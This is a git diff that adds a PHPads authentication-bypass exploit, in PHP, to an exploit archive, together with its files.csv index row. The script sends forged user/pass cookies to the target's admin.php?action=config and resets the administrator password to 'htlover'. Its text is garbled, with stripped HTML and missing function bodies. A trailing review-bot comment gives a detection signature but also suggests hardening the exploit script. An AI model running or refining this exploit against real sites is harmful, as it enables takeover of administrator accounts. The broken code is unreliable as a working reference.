diff --git a/files.csv b/files.csv
index d005aa57c..7850f3177 100755
--- a/files.csv
+++ b/files.csv
@@ -32012,6 +32012,7 @@ id,file,description,date,author,platform,type,port
 35531,platforms/windows/local/35531.py,"Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow Exploit DoS (.lst)",2014-12-15,s-dz,windows,local,0
 35532,platforms/windows/local/35532.py,"jaangle 0.98i.977 - Denial of Service Vulnerability",2014-12-15,s-dz,windows,local,0
 35533,platforms/php/webapps/35533.py,"Wordpress Download Manager 2.7.4 - Remote Code Execution Vulnerability",2014-12-15,"Claudio Viviani",php,webapps,0
+35535,platforms/php/webapps/35535.php,"PHPads <= 213607 - Authentication Bypass / Password Change Exploit",2014-12-15,"Shaker msallm",php,webapps,0
 35539,platforms/php/dos/35539.txt,"phpMyAdmin 4.0.x / 4.1.x / 4.2.x - DoS",2014-12-15,"Javer Nieto and Andres Rojas",php,dos,0
 35541,platforms/php/webapps/35541.txt,"ResourceSpace 6.4.5976 - XSS / SQL Injection / Insecure Cookie Handling",2014-12-15,"Adler Freiheit",php,webapps,0
 35543,platforms/php/webapps/35543.txt,"Wordpress Wp Symposium 14.11 - Unauthenticated Shell Upload Exploit",2014-12-15,"Claudio Viviani",php,webapps,0
diff --git a/platforms/php/webapps/35535.php b/platforms/php/webapps/35535.php
new file mode 100755
index 000000000..7acb737c1
--- /dev/null
+++ b/platforms/php/webapps/35535.php
@@ -0,0 +1,61 @@
+ PHPads Authentication Bypass Exploit +
+PHPads Authentication Bypass / Administrator Password Change Exploit
+
+Target :

+
+ '1', + 'newlogin' => $username, + 'newpass' => "htlover"); + $ch = curl_init(); + curl_setopt($ch, CURLOPT_URL,$target); + curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); + curl_setopt($ch, CURLOPT_COOKIE, 'user='.$username.'; pass='.$password); + curl_setopt($ch,CURLOPT_POST,true); + curl_setopt($ch,CURLOPT_POSTFIELDS,$post); + $result = curl_exec($ch); + if(preg_match("/Code Generator/", $result)) + { + return "

Success !! Password changed
username: ".$username." | password: htlover"; + }else{ + return "Something wrong
"; + } + curl_close($ch); +} + +if (isset($_POST['submit'])) +{ + $target = $_POST['target']; + //login($target, $username, $userid); + $logins = login($target); + echo "USERNAME :" . $logins[0]; // username + echo "
PASSWORD :" . $logins[1]; // password + echo adminchange($target.'/admin.php?action=config', $logins[0], $logins[1]); +} + + + + +?> +
\ No newline at end of file
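Review bot: `$_POST['target']` is passed unchecked into `CURLOPT_URL` in `adminchange()` (and into `login()`, whose body is not visible in this rendering), and the values that come back are echoed into the page unescaped, so a copy of this file left on a reachable web server acts as a request relay and reflects whatever the remote host returns. The handler should reject bad input first, e.g. `if (!filter_var($target, FILTER_VALIDATE_URL)) { exit('invalid target'); }`, pin the transport with `curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);`, and wrap the echoed fields in `htmlspecialchars()`. The file also has no header comment; one stating the affected release given in files.csv (PHPads <= 213607) and that a successful run leaves the admin account on the fixed password `htlover` would tell responders which credentials to rotate. For detection, the visible request shape is a POST to `admin.php?action=config` carrying `newlogin`/`newpass` together with `user=`/`pass=` cookies, which is what to look for in request logs or WAF telemetry. Separately, `curl_close($ch)` sits after both `return` statements and never runs.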